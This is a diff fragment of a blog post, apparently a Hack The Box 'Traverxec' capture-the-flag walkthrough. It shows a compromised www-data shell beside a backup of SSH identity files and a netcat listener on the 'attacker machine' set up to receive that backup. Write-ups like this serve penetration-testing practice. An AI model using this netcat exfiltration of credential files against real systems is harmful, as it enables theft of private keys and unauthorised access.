ricobandy/ricobandy.github.io/_posts/2020-04-10-Traverxec-HTB.md

 -rw-r--r-- 1 david david 1.9K Oct 25 17:02 backup-ssh-identity-files.tgz
 www-data@traverxec:/usr/bin$
 ```

-We can use netcat to transfer the file from the server to our local machine
+We can use netcat to transfer the file from the server to our local machine.
+On attacker machine:

-On kali machine:

 ```
 # nc -lvp 9001 > backup-ssh-identity-files.tgz